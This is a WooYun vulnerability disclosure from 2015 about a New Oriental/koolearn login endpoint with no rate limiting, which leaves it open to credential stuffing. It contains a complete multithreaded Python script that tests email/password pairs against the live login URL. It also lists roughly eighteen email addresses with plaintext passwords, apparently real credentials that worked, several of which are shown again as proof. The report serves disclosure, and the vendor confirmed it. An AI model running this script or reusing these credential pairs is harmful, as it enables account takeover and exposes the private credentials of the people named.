当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110964

漏洞标题:新东方某登陆处设计缺陷可撞库

相关厂商:新东方

漏洞作者: jaffer

提交时间:2015-04-29 20:38

修复时间:2015-06-14 17:28

公开时间:2015-06-14 17:28

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-04-30: 厂商已经确认,细节仅向厂商公开
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-14: 细节向公众公开

简要描述:

rt

详细说明:

地址:

http://115.182.44.211/index.php/site/login


使用koolearn账号体系登录的。虽然是教师登录,但是如果是正确的用户,会返回success。并且该登录没有做任何限制。
一个简单的python脚本。email里面是邮箱与密码的组合

#!/usr/bin/env python
#-*-coding:utf-8-*-
import httplib2
import urllib2
import urllib
import socket
from urllib import urlopen
from string import replace,find,lower
from httplib import HTTPException
import time
import threadpool
import threading
mutex = threading.Lock()
class fuzz(object):
def __init__(self,user_pwd,count):
self.user_pwd = user_pwd
self.good = []
self.count = count
self.threadnum = 10
def makePackage(self,euser,epwd):
url = 'http://login.koolearn.com/sso/login.do?userName='+euser+'&password='+epwd+'&channel=wangqian&responseType=json&type=jsonp&callback=jQuery18204328589937649667_1430216268449&_=1430226430181'
print url
print euser
print epwd
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'}
try:
h = httplib2.Http()
res,con = h.request(url,'GET',headers = headers)
print con
except:
pass
i = con.find('error')
t = []
if i == -1:
if mutex.acquire():
self.good.append([euser,epwd])
mutex.release()
else:
pass

def preS(self):
base = 0
for each in self.user_pwd:
self.makePackage(each[0],each[1][0:-1])
if mutex.acquire():
if len(self.good) != base:
self.save()
base = len(self.good)
mutex.release()

def save(self):
fp = open('result','w')
for each in self.good:
fp.writelines(each[0]+' '+each[1]+'\n')
fp.close()

def gothread(self):
#建立进程池
pool = threadpool.ThreadPool(self.threadnum)
#两个list合并,直接相加就可以
count = 0
base = 0
for i in range(self.count):
print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n'
if mutex.acquire():
if len(self.good) != base:
self.save()
print 'OK\n'
base = len(self.good)
mutex.release()
pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1])
#join and destroy all threads
pool.destroy()

if __name__=='__main__':
f = open('email','r')
up = []
count = 0
while True:
line = f.readline()
if line:
i = line.find(' ')
user = line[0:i]
pwd = line[i+1:]
up.append([user,pwd])
count = count + 1
else:
break
f.close()
test = fuzz(up,count)
test.preS()


撞库:

cocoa@263.net fantacy2
jassonz@21cn.com caijun
shunvlh@263.net lh1112
lxhit@21cn.com 781120
billhao@hotmail.com 888999
XuZuotao@263.net.cn 751027
Chinamofee@sohu.com 6y1x3ca
flyfly@21cn.com flying123
childman@163.com chudird
wudw@263.net 556575
dimpleok@hotmail.com jasmine8
jouzen@163.net zhugh
TtiGeR@cableplus.com.cn sysop123
lxy@yytvu .net 58328
linwx1978@sohu.com iamjohns
with2000@21cn.com hello
fair_zhj@163.net 0531fair
liguodong@263.net lgd73
.......


漏洞证明:

cocoa@263.net fantacy2

1.png


jassonz@21cn.com caijun

2.jpg


billhao@hotmail.com 888999

3.png


with2000@21cn.com hello

45.png

修复方案:

防撞库

版权声明:转载请注明来源 jaffer@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-30 17:26

厂商回复:

感谢支持新东方安全,谢谢。

最新状态:

暂无


漏洞评价:

评论